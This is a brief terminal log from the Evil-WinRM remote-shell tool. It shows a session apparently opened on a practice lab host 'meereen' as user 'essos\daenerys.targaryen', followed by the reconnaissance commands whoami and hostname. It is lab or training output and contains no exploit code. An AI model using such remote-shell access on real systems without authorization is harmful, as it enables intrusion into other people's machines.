                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                                                  
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                             
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents> whoami
essos\daenerys.targaryen
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents> hostname
meereen